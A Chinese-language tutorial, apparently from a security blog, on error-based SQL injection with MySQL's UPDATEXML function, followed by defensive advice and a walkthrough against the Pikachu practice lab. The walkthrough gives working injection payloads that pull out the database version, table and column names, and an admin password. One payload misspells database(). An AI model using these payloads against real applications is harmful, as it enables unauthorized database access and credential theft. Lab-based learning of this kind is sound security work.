字符串类型漏洞之updatexml函数盲注

UPDATEXML 是 MySQL 数据库中的一个函数,它用于对 XML 文档数据进行修改和查询。然而,当它被不当地使用或与恶意输入结合时,它可能成为 SQL 注入攻击的一部分,从而暴露敏感信息或导致其他安全漏洞。

在 SQL 注入攻击中,攻击者尝试通过在应用程序的输入字段中插入或“注入”恶意的 SQL 代码片段,来干扰应用程序的正常 SQL 查询。如果应用程序没有正确地验证和清理用户输入,攻击者可能能够执行未经授权的数据库操作。

原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

UPDATEXML 函数在某些情况下可以被用于“盲注”(blind SQL injection)攻击中,以从数据库中提取数据。盲注是指攻击者无法直接看到查询结果的情况,但可以通过观察应用程序的响应(例如,是否产生错误)来推断出查询的结果。

以下是一个简单的例子来说明如何使用 UPDATEXML 进行盲注攻击:

假设有一个容易受到 SQL 注入攻击的查询,它使用用户提供的输入来构建 SQL 语句:

SELECT * FROM users WHERE username = '$username' AND password = '$password';
攻击者可以尝试注入 UPDATEXML 函数来触发一个错误,并通过错误消息的内容来推断出数据库中的信息。例如:

' OR 1=1 AND (SELECT UPDATEXML(1,CONCAT(0x7e,(SELECT @@version),0x7e),1))
这个注入尝试会修改原始的 SQL 查询,导致它执行一个 UPDATEXML 函数调用。如果 UPDATEXML 的第二个参数包含的数据导致一个无效的 XML 文档,MySQL 将抛出一个错误。攻击者通过构造 CONCAT 函数来包含他们想要查询的信息(在这个例子中是数据库的版本号 @@version),并将其夹在两个 0x7e(波浪号 ~ 的 ASCII 值)之间。如果查询成功执行并返回错误,错误消息中可能会包含这些信息,从而泄露给攻击者。

为了防止这种攻击,开发者应该采取以下措施:

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

参数化查询:使用预编译语句或参数化查询来避免直接将用户输入拼接到 SQL 语句中。
输入验证和清理:对用户输入进行严格的验证和清理,确保只接受预期的格式和类型的数据。
错误处理:不要向最终用户显示详细的数据库错误信息。使用自定义错误页面或日志记录来处理错误。
最小权限原则:确保数据库连接使用的帐户具有执行必要操作所需的最小权限。避免使用具有过多权限的数据库帐户。
最后,建议定期进行安全审计和漏洞扫描,以确保应用程序的安全性。

接着我们以Pikachu漏洞平台为例子:

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术
先随便输入一个字符“'”,检查有没有错误返回信息。
如果存在返回错误信息,就说明这里存在sql注入漏洞

QQ截图20240425215406.png

接着我们输入“x%' and updatexml(1,concat(0x7e,version()),0)#
查询当前的数据库版本信息

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术

屏幕截图 2024-04-25 220050.png


接着我们获取当前的数据库用户名,输入“x%' and updatexml(1,concat(0x7e,datebase()),0)#
 

屏幕截图 2024-04-25 220356.png


接着我们获取当前报错返回信息行数

 原文地址: 字符串漏洞注入之updatexml函数盲注 - 红客网-网络安全与渗透技术
输入“x%' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='sqlmap')),0)#

屏幕截图 2024-04-25 223053.png


接着一次次获取表名
x%' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='sqlmap' limit 0,1)),0)#

屏幕截图 2024-04-25 223307.png


接着我们获取列名
x%' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name ='users' limit 0,1)),0)#
 

屏幕截图 2024-04-25 224059.png


接着我们获取登录信息
x%' and updatexml(1,concat(0x7e,(select password from users where username = 'admin' limit 0,1)),0)#

屏幕截图 2024-04-25 224647.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/579332.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

通过Cmake官网下载.gz文件安装最新版本的CMAKE、适用于debian

1.前往官网下载最新版本debian https://cmake.org/download/ 2.选他 3. 通过XFTP传输到服务器 4. 解压文件 #cd 进入对应目录,然后执行下面命令解压 $ tar -zxvf cmake-3.29.2.tar.gz5.执行这个文件 $ ./bootstrap6.完成之后再执行这个 $ make7.然后&#xff…

C语言--贪吃蛇小游戏

目录 一、Win32API介绍 1.1Win32API 1.2控制台程序 1.3控制台屏幕上的坐标COORD 1.4GetStdHandle 1.5GetConsoleCursorInfo 1.6 CONSOLE_CURSOR_INFO 1.7 SetConsoleCursorInfo 1.8SetConsoleCursorPosition 1.9GetAsyncKeyState 二、贪吃蛇游戏设计与分析 2.1地图 …

双重注意力模块 DoubleAttention | A2-Nets: Double Attention Networks

论文名称:《 A 2 A^2 A2-Nets: Double Attention Networks》 论文地址:https://arxiv.org/pdf/1810.11579.pdf 学习捕捉远距离关系对于图像/视频识别是基础性的。现有的CNN模型通常依靠增加深度来建模这些关系,这在很大程度上效率低下。在这…

数字旅游打造个性化旅行体验,科技让旅行更精彩:借助数字技术,旅行者可以定制专属旅行计划,享受个性化的旅行体验

目录 一、引言 二、数字旅游的兴起与发展 三、数字技术助力个性化旅行体验 1、智能推荐系统:精准匹配旅行者需求 2、定制化旅行计划:满足个性化需求 3、实时互动与分享:增强旅行体验 四、科技提升旅行便捷性与安全性 1、移动支付与电…

boot https ssl 使用http协议访问报错

在springboot中配置ssl以后, 再次使用http访问对应的接口就会报错 可以考虑如下设置,将http访问的端口重定向到https对应的端口 import org.apache.catalina.Context; import org.apache.catalina.connector.Connector; import org.apache.tomcat.util…

图像处理ASIC设计方法 笔记18 轮廓跟踪算法的硬件加速方案

目录 1排除伪孤立点(断裂链表)方法1 限制链表的长度方法2 增加判断条件排除断裂链表方法3 排除不必要跟踪的轮廓(推荐用这个方法) P129 轮廓跟踪算法的硬件加速方案 1排除伪孤立点(断裂链表) 如果图像中某…

探索开源的容器引擎--------------Docker容器操作

目录 一、Docker 容器操作 1.1容器创建 1.2查看容器的运行状态 1.3启动容器 1.4创建并启动容器 1.4.1当利用 docker run 来创建容器时, Docker 在后台的标准运行过程是: 1.4.2在后台持续运行 docker run 创建的容器 1.4.3创建容器并持续运行容器…

Pytorch基础:torch.load_state_dict()方法在加载时不会检查类型

相关阅读 Pytorch基础https://blog.csdn.net/weixin_45791458/category_12457644.html?spm1001.2014.3001.5482 笔者在使用torch.nn.module的load_state_dict中出现了一个问题,一个被注册的张量在加载后居然没有变化,一开始以为是加载出现了问题&#…

Kafka 3.x.x 入门到精通(07)——Java应用场景——SpringBoot集成

Kafka 3.x.x 入门到精通(07)——Java应用场景——SpringBoot集成 4. Java应用场景——SpringBoot集成4.1 创建SpringBoot项目4.1.1 创建SpringBoot项目4.1.2 修改pom.xml文件4.1.3 在resources中增加application.yml文件 4.2 编写功能代码4.2.1 创建配置…

debian配置BIND DNS服务器

前言 局域网内有很多台主机,IP难以记忆。 而修改hosts文件又难以做到配置共享和统一,需要一台内网的DNS服务器。 效果展示 这里添加了一个域名hello.dog,将其指向为192.168.1.100。 同时,外网的域名不会受到影响,…

基于粒子滤波器的电池剩余使用寿命计算matlab仿真

目录 1.课题概述 2.系统仿真结果 3.核心程序与模型 4.系统原理简介 4.1 粒子滤波器基础 4.2 电池剩余使用寿命建模与预测 4.3 粒子滤波器在电池寿命预测中的应用 5.完整工程文件 1.课题概述 基于粒子滤波器的电池剩余使用寿命计算。根据已知的数据,预测未来…

前端框架编译器之模板编译

编译原理概述 编译原理:是计算机科学的一个分支,研究如何将 高级程序语言 转换为 计算机可执行的目标代码 的技术和理论。 高级程序语言:Python、Java、JavaScript、TypeScript、C、C、Go 等。计算机可执行的目标代码:机器码、汇…

高级IO|从封装epoll服务器到实现Reactor服务器|Part1

从封装epoll_server到实现reactor服务器(part1) 项目复习:从封装epoll_server到实现reactor服务器(part1)EPOLL模式服务器初步 select, poll, epoll的优缺点epoll的几个细节封装epoll_server基本框架先写好创建监听套接字和创建epoll模型可以Accept了吗&#xff1f…

鸿蒙OpenHarmony【轻量系统 运行】 (基于Hi3861开发板)

运行 联网配置 由于Hi3861为WLAN模组,您可以在版本编译及烧录后,通过如下操作,使开发板实现联网功能。 保持Windows工作台和Hi3861 WLAN模组的连接状态,确认串口终端显示正常。 复位Hi3861 WLAN模组,终端界面显示“…

网络攻击日益猖獗,安全防护刻不容缓

“正在排队登录”、“账号登录异常”、“断线重连”......伴随着社交软件用户的一声声抱怨,某知名社交软件的服务器在更新上线2小时后,遭遇DDoS攻击,导致用户无法正常登录。在紧急维护几小时后,这款软件才恢复正常登录的情况。 这…

视频通话实时换脸:支持训练面部模型 | 开源日报 No.235

iperov/DeepFaceLive Stars: 19.7k License: GPL-3.0 DeepFaceLive 是一个用于 PC 实时流媒体或视频通话的人脸换装工具。 可以使用训练好的人脸模型从网络摄像头或视频中交换面部。提供多个公共面部模型,包括 Keanu Reeves、Mr. Bean 等。支持自己训练面部模型以…

基于数据挖掘的斗鱼直播数据可视化分析系统

温馨提示:文末有 CSDN 平台官方提供的学长 QQ 名片 :) 1. 项目简介 随着网络直播平台的兴起,斗鱼直播作为其中的佼佼者,吸引了大量用户和观众。为了更好地理解和分析斗鱼直播中的数据,本项目介绍了一个基于数据挖掘的斗鱼直播数据…

【图解计算机网络】简单易懂的https原理解析

简单易懂的https原理解析 https与http的区别混合加密对称加密非对称加密混合加密解析混合加密问题 摘要算法数字证书数字证书原理为什么通过CA证书可以解决中间人攻击的问题呢? https握手流程 https与http的区别 http是明文传输的,非常不安全&#xff0…